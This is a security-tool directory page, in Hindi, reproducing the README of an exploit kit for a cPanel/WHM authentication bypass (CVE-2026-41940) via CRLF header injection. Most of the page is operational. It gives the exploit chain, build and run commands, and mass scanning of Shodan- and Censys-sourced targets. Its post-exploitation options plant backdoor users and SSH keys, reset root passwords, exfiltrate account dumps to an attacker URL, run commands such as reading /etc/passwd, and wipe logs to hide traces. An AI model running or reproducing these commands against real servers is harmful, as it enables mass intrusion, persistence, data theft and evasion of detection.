Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940-Exploit-PoC — CVE-2026-41940 के लिए एक्सप्लॉइट PoC, जो CRLF इंजेक्शन के माध्यम से cPanel और WHM प्रमाणीकरण बायपास है। इसमें मास स्कैनिंग, पोस्ट-एक्सप्लॉइटेशन क्रियाएँ, और अधिकृत परीक्षण के लिए एक इंटरैक्टिव शेल शामिल है। | Kitploit
उपकरण/GitHubGitHub/ishanoshada/cve-2026-41940-exploit-poc
प्रमाणीकरण और प्राधिकरणभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
ishanoshada/cve-2026-41940-exploit-poc

CVE-2026-41940-Exploit-PoC

CVE-2026-41940 के लिए एक्सप्लॉइट PoC, जो CRLF इंजेक्शन के माध्यम से cPanel और WHM प्रमाणीकरण बायपास है। इसमें मास स्कैनिंग, पोस्ट-एक्सप्लॉइटेशन क्रियाएँ, और अधिकृत परीक्षण के लिए एक इंटरैक्टिव शेल शामिल है।

रिपॉजिटरी देखेंवेबसाइट
213 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-41940 एक्सप्लॉइट PoC – cPanel और WHM प्रमाणीकरण बाईपास

CVE-2026-41940 CVSS Go Version License

टूल द्वारा: Ishan Oshada | GitHub

⚠️ केवल अधिकृत सुरक्षा परीक्षण के लिए। अनधिकृत उपयोग अवैध है।

1


📋 विषय-सूची

  • भेद्यता अवलोकन
  • एक्सप्लॉइट श्रृंखला
  • विशेषताएँ
  • स्थापना
  • त्वरित प्रारंभ
  • उपयोग उदाहरण
  • पोस्ट-एक्सप्लॉइट क्रियाएँ
  • इंटरैक्टिव शेल कमांड
  • urls.txt के साथ बड़े पैमाने पर स्कैनिंग
  • आउटपुट उदाहरण
  • विकल्प संदर्भ
  • प्रभावित संस्करण
  • सभी प्लेटफार्मों के लिए निर्माण
  • FAQ और समस्या निवारण
  • अस्वीकरण
  • लेखक

2

भेद्यता अवलोकन

CVE-2026-41940 cPanel और WHM (संस्करण < 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, 11.136.0.5) में एक CRLF इंजेक्शन भेद्यता है।

saveSession() फ़ंक्शन filter_sessiondata() लागू करने के बाद सत्र डेटा लिखता है, लेकिन फ़िल्टर बहुत देर से लागू किया जाता है। Authorization: Basic हेडर के अंदर CRLF (\r\n) वर्णों को इंजेक्ट करके, एक हमलावर डिस्क पर मौजूद सत्र फ़ाइल को मनमाने कुंजी-मूल्य जोड़ों (जैसे, hasroot=1, tfa_verified=1, user=root) के साथ विषाक्त कर सकता है।

जब विषाक्त सत्र बाद में लोड किया जाता है, तो cPanel/WHM बिना किसी पासवर्ड के पूर्ण रूट एक्सेस प्रदान करता है।

CVSS स्कोर: 10.0 (गंभीर)

  • हमला वेक्टर: नेटवर्क
  • हमला जटिलता: कम
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता सहभागिता: कोई नहीं
  • गोपनीयता: उच्च
  • अखंडता: उच्च
  • उपलब्धता: उच्च

एक्सप्लॉइट श्रृंखला (4 चरण)


विशेषताएँ

  • ✅ एकल और बड़े पैमाने पर स्कैनिंग (फ़ाइल इनपुट, stdin पाइप)
  • ✅ थ्रेडेड स्कैनिंग (100+ थ्रेड तक समवर्तीता नियंत्रण)
  • ✅ वर्बोज़ मोड (--verbose) – पूर्ण HTTP अनुरोध/प्रतिक्रियाएँ दिखाता है
  • ✅ JSON आउटपुट (भेद्य लक्ष्य मिलने पर स्वतः सहेजता है)
  • ✅ 10 पोस्ट-एक्सप्लॉइट क्रियाएँ (नीचे तालिका देखें)
  • ✅ क्रॉस-प्लेटफ़ॉर्म (Windows, Linux, macOS)
  • ✅ कोई बाहरी निर्भरता नहीं (केवल Go मानक पुस्तकालय)
  • ✅ रंगीन टर्मिनल आउटपुट स्पष्ट बॉक्स्ड परिणामों के साथ
  • ✅ सत्र स्थिरता – कीप-अलाइव तंत्र
  • ✅ इंटरैक्टिव WHM शेल कमांड इतिहास के साथ

स्थापना

पूर्वापेक्षाएँ

  • Go 1.20 या उच्चतर (डाउनलोड)

रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/ishanoshada/CVE-2026-41940-Exploit-PoC.git
cd CVE-2026-41940-Exploit-PoC

निष्पादन योग्य बनाएँ

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go

Linux / macOS

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper

सीधे चलाएँ (बिना निर्माण के)

root@kitploit:~
go run main.go -u https://target.com:2087

पूर्व-निर्मित बाइनरी (सबसे तेज़ तरीका)

स्रोत से निर्माण करने के बजाय, आप रिपॉजिटरी से नवीनतम स्थिर निष्पादन योग्य सीधे डाउनलोड कर सकते हैं। ये हर अपडेट के लिए स्वचालित रूप से उत्पन्न होते हैं:

नोट: यदि Linux या macOS का उपयोग कर रहे हैं, तो डाउनलोड करने के बाद निष्पादन अनुमतियाँ देना याद रखें:


त्वरित प्रारंभ

root@kitploit:~
# बुनियादी स्कैन
go run main.go -u https://target.com:2087

# सभी cPanel खाते सूचीबद्ध करें
go run main.go -u https://target.com:2087 -action list

# इंटरैक्टिव WHM शेल
go run main.go -u https://target.com:2087 -action shell

# urls.txt के साथ बड़े पैमाने पर स्कैन
go run main.go -l urls.txt -t 20 -o results.json

उपयोग उदाहरण (तालिका)


पोस्ट-एक्सप्लॉइट क्रियाएँ


इंटरैक्टिव शेल कमांड

शेल के अंदर एक बार (-action shell), इन कमांड का उपयोग करें:


urls.txt के साथ बड़े पैमाने पर स्कैनिंग

रिपॉजिटरी में बड़े पैमाने पर स्कैनिंग के लिए 1000 उदाहरण लक्ष्यों के साथ urls.txt शामिल है।

urls.txt प्रारूप

root@kitploit:~
https://192.168.1.1:2087
https://192.168.1.2:2087
https://example1.com:2087
https://example2.com:2087
...

बड़े पैमाने पर स्कैन कमांड

root@kitploit:~
# बुनियादी बड़े पैमाने पर स्कैन (10 थ्रेड)
go run main.go -l urls.txt

# तेज़ बड़े पैमाने पर स्कैन (50 थ्रेड, परिणाम सहेजें)
go run main.go -l urls.txt -t 50 -o results.json

# पोस्ट-एक्सप्लॉइट क्रिया के साथ बड़े पैमाने पर स्कैन
go run main.go -l urls.txt -t 20 -action list -o hacked_servers.json

# वर्बोज़ आउटपुट के साथ बड़े पैमाने पर स्कैन
go run main.go -l urls.txt -t 10 --verbose

# बढ़े हुए टाइमआउट के साथ बड़े पैमाने पर स्कैन (धीमे नेटवर्क)
go run main.go -l urls.txt -t 30 -timeout 30

urls.txt स्वयं उत्पन्न करें

root@kitploit:~
# IP रेंज उत्पन्न करें (Linux/macOS)
for i in {1..254}; do echo "https://192.168.1.$i:2087"; done > urls.txt

# IP रेंज उत्पन्न करें (Windows PowerShell)
1..254 | ForEach-Object { "https://192.168.1.$($_):2087" } > urls.txt

# Shodan से
shodan search --fields ip_str,port 'title:"WHM Login"' | awk '{print "https://"$1":"$2}' > urls.txt

# Censys से
censys search 'services.port=2087' | awk '{print "https://"$1":2087"}' > urls.txt

आउटपुट उदाहरण

भेद्य लक्ष्य मिला

root@kitploit:~
╔════════════════════════════════════════════════════════════════╗
║                    भेद्य लक्ष्य का पता चला                     ║
╠════════════════════════════════════════════════════════════════╣
║ लक्ष्य: https://target.example.com:2087                        ║
║ टोकन: /cpsess1234567890                                       ║
║ संस्करण: 11.76.0.22                                            ║
║ सत्र: :od2aMhg5zJeQunUy...                                  ║
║ API URL: https://target.example.com:2087/cpsess1234567890/json-api/version ║
╚════════════════════════════════════════════════════════════════╝

[+] क्रिया: LIST
    • उपयोगकर्ता: admin | डोमेन: example.com
    • उपयोगकर्ता: backup | डोमेन: backup.example.com
    • उपयोगकर्ता: client1 | डोमेन: client1.com

सारांश आउटपुट

root@kitploit:~
════════════════════════════════════════════════════════════════════
                    स्कैन पूर्ण सारांश
════════════════════════════════════════════════════════════════════
  कुल स्कैन किए गए लक्ष्य: 1000
  भेद्य लक्ष्य: 47
  बीता समय: 125.34 सेकंड

भेद्य लक्ष्य:
────────────────────────────────────────────────────────────────
  1. https://192.168.1.15:2087
      टोकन: /cpsess1111111111
      संस्करण: 11.76.0.22
      सत्र: :od2aMhg5zJeQunUy...
  2. https://192.168.1.42:2087
      टोकन: /cpsess2222222222
      संस्करण: 11.86.0.15
      सत्र: Km2psnYR9w3rRkLU...
  3. https://example.com:2087
      टोकन: /cpsess3333333333
      संस्करण: 11.118.0.42
      सत्र: Xk9mQrNtPw3sVbLm...

════════════════════════════════════════════════════════════════════

[✓] परिणाम सहेजे गए: results.json

विकल्प संदर्भ


प्रभावित संस्करण


सभी प्लेटफार्मों के लिए निर्माण

Windows

root@kitploit:~
go build -o cpanel_sniper.exe main.go
cpanel_sniper.exe -u https://target.com:2087

Linux

root@kitploit:~
go build -o cpanel_sniper main.go
chmod +x cpanel_sniper
./cpanel_sniper -u https://target.com:2087

macOS (Intel)

root@kitploit:~
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

macOS (Apple Silicon M1/M2/M3)

root@kitploit:~
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

सभी प्लेटफार्मों के लिए क्रॉस-कंपाइल

root@kitploit:~
# Windows
GOOS=windows GOARCH=amd64 go build -o cpanel_sniper_windows.exe main.go

# Linux
GOOS=linux GOARCH=amd64 go build -o cpanel_sniper_linux main.go

# macOS Intel
GOOS=darwin GOARCH=amd64 go build -o cpanel_sniper_mac_intel main.go

# macOS M1/M2
GOOS=darwin GOARCH=arm64 go build -o cpanel_sniper_mac_m1 main.go

# Linux ARM (Raspberry Pi)
GOOS=linux GOARCH=arm64 go build -o cpanel_sniper_linux_arm64 main.go

निर्देशिका संरचना

root@kitploit:~
CVE-2026-41940-Exploit-PoC/
├── README.md           # दस्तावेज़ीकरण
├── bin/                # पूर्व-निर्मित मल्टी-प्लेटफ़ॉर्म निष्पादन योग्य 
│   ├── windows_x64/
│   ├── linux_x64/
│   └── ...
├── main.go             # मुख्य स्रोत कोड
├── urls.txt            # 1000 उदाहरण लक्ष्य
├── go.mod              # Go मॉड्यूल फ़ाइल
├── .gitignore          # Git इग्नोर फ़ाइल
└── results.json        # आउटपुट फ़ाइल (उत्पन्न)

अस्वीकरण

यह टूल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है।

कंप्यूटर सिस्टम तक अनधिकृत पहुँच निम्नलिखित के तहत अवैध है:

  • कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (CFAA) - USA
  • कंप्यूटर दुरुपयोग अधिनियम - UK
  • सूचना प्रौद्योगिकी अधिनियम - भारत
  • दुनिया भर में समान कानून

लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता। अपने जोखिम पर उपयोग करें।

इस टूल का उपयोग करके, आप सहमत हैं कि आपके पास लक्ष्य प्रणालियों का परीक्षण करने का उचित अधिकार है।


लेखक

Ishan Oshada

  • 🔗 वेबसाइट: ishanoshada.com
  • 🐙 GitHub: github.com/ishanoshada
  • 📧 ईमेल: [email protected]

Views

समर्थन

यदि आपको यह टूल उपयोगी लगता है:

  • ⭐ GitHub पर रिपॉजिटरी को स्टार करें
  • 🔄 सुरक्षा समुदाय के साथ साझा करें
  • 📝 GitHub Issues के माध्यम से समस्याएँ रिपोर्ट करें

हैप्पी हैकिंग! 🚀

याद रखें: महान शक्ति के साथ महान जिम्मेदारी आती है। नैतिक रूप से उपयोग करें।

टूल डाउनलोड करें
चरणक्रियाविवरण
1POST /login/?login_only=1गलत क्रेडेंशियल्स के साथ प्री-ऑथ सत्र कुकी का अनुरोध करें
2GET / + CRLF Authorization हेडरसत्र फ़ाइल को hasroot=1, user=root, आदि के साथ विषाक्त करें
3GET /scripts2/listacctsसत्र कैश को विषाक्त फ़ाइल को पुनः लोड करने के लिए बाध्य करें (प्रसार)
4GET /cpsess<TOKEN>/json-api/versionरूट एक्सेस सत्यापित करें – सफलता = 200 + संस्करण डेटा
प्लेटफ़ॉर्मस्थान
Windows (x64)/bin/windows_x64/cpanel_sniper.exe
Linux (x64)/bin/linux_x64/cpanel_sniper
Linux (ARM64)/bin/linux_arm64/cpanel_sniper
macOS (Intel)/bin/mac_intel/cpanel_sniper
macOS (M1/M2/M3)/bin/mac_m1_m2/cpanel_sniper
#उद्देश्यकमांड
1बुनियादी एकल लक्ष्य स्कैनgo run main.go -u https://target.com:2087
2सभी cPanel खाते सूचीबद्ध करेंgo run main.go -u https://target.com:2087 -action list
3रूट पासवर्ड बदलेंgo run main.go -u https://target.com:2087 -action passwd -passwd "NewP@ssw0rd!2006"
4सिस्टम कमांड निष्पादित करेंgo run main.go -u https://target.com:2087 -action cmd -cmd "id && whoami"
5सर्वर जानकारी प्राप्त करेंgo run main.go -u https://target.com:2087 -action info
6बैकडोर उपयोगकर्ता बनाएँgo run main.go -u https://target.com:2087 -action adduser -new-user backdoor -new-domain backdoor.com -passwd "Pass123!2006"
7API टोकन बनाएँ (गुप्त)go run main.go -u https://target.com:2087 -action apitoken -tokenname mytoken
8SSH कुंजी इंजेक्ट करेंgo run main.go -u https://target.com:2087 -action sshkey -sshkey "ssh-rsa AAAAB3NzaC1yc2E..."
9खाता डंप और बाहर निकालेंgo run main.go -u https://target.com:2087 -action dumpacct -dumpuser victim -exfil https://attacker.com/upload
10लॉग मिटाएँ और निशान छिपाएँgo run main.go -u https://target.com:2087 -action wipe
11इंटरैक्टिव WHM शेलgo run main.go -u https://target.com:2087 -action shell
12फ़ाइल से बड़े पैमाने पर स्कैनgo run main.go -l urls.txt -t 20 -o results.json
13परिणाम JSON में सहेजेंgo run main.go -u https://target.com:2087 -o scan_results.json
14वर्बोज़ डिबगिंग सक्षम करेंgo run main.go -u https://target.com:2087 --verbose
15अन्य टूल से पाइपcat urls.txt | go run main.go -t 20
16टाइमआउट बढ़ाएँgo run main.go -u https://target.com:2087 -timeout 30
क्रियाफ़्लैगविवरणगोपनीयता स्तर
list-action listसभी cPanel खाते सूचीबद्ध करेंकम
passwd-action passwd -passwd NEWPASSरूट पासवर्ड बदलें (शोरगुल वाला)उच्च (पता लगाने योग्य)
cmd-action cmd -cmd "id"OS कमांड निष्पादित करेंमध्यम
info-action infoहोस्टनाम, लोड, संस्करण दिखाएँकम
adduser-action adduser -new-user U -new-domain Dबैकडोर cPanel उपयोगकर्ता बनाएँमध्यम
apitoken-action apitoken [-tokenname NAME]स्थायी API टोकन उत्पन्न करेंबहुत कम
sshkey-action sshkey -sshkey "ssh-rsa..."रूट में SSH सार्वजनिक कुंजी इंजेक्ट करेंबहुत कम
dumpacct-action dumpacct -dumpuser USER -exfil URLखाता बैकअप और बाहर निकालेंमध्यम
wipe-action wipeWAF अक्षम करें, लॉग साफ़ करें, इतिहास मिटाएँनिशान छिपाएँ
shell-action shellइंटरैक्टिव WHM शेलकम
कमांडविवरणउदाहरण
accountsसभी cPanel खाते सूचीबद्ध करेंaccounts
passwd <pass>रूट पासवर्ड बदलेंpasswd MyNewPass123!2006
exec <command>सिस्टम कमांड निष्पादित करेंexec "cat /etc/passwd"
infoसर्वर जानकारी दिखाएँinfo
versioncPanel संस्करण दिखाएँversion
helpउपलब्ध कमांड दिखाएँhelp
exitशेल से बाहर निकलेंexit
विकल्पप्रकारडिफ़ॉल्टविवरण
-ustring-लक्ष्य URL (जैसे, https://example.com:2087)
-lstring-लक्ष्यों वाली फ़ाइल (प्रति पंक्ति एक)
-tint10समवर्ती थ्रेड की संख्या
-actionstring-पोस्ट-एक्सप्लॉइट क्रिया
-passwdstring-नया पासवर्ड (passwd/adduser के लिए)
-cmdstring-निष्पादित करने के लिए कमांड (cmd क्रिया के लिए)
-new-userstring-adduser क्रिया के लिए उपयोगकर्ता नाम
-new-domainstring-adduser क्रिया के लिए डोमेन
-tokennamestring-API टोकन के लिए नाम (apitoken क्रिया)
-sshkeystring-इंजेक्ट करने के लिए सार्वजनिक SSH कुंजी (sshkey क्रिया)
-dumpuserstring-बैकअप के लिए उपयोगकर्ता नाम (dumpacct क्रिया)
-exfilstring-बाहर निकालने के लिए दूरस्थ URL (dumpacct क्रिया)
-ostring-आउटपुट JSON फ़ाइल (मिलने पर स्वतः सहेजता है)
--verboseboolfalseHTTP अनुरोध/प्रतिक्रियाएँ दिखाएँ
-hboolfalseसहायता मेनू दिखाएँ
शाखापैच किया गया संस्करणभेद्य <
11.11011.110.0.9711.110.0.96
11.11811.118.0.6311.118.0.62
11.12611.126.0.5411.126.0.53
11.13211.132.0.2911.132.0.28
11.13411.134.0.2011.134.0.19
11.13611.136.0.511.136.0.4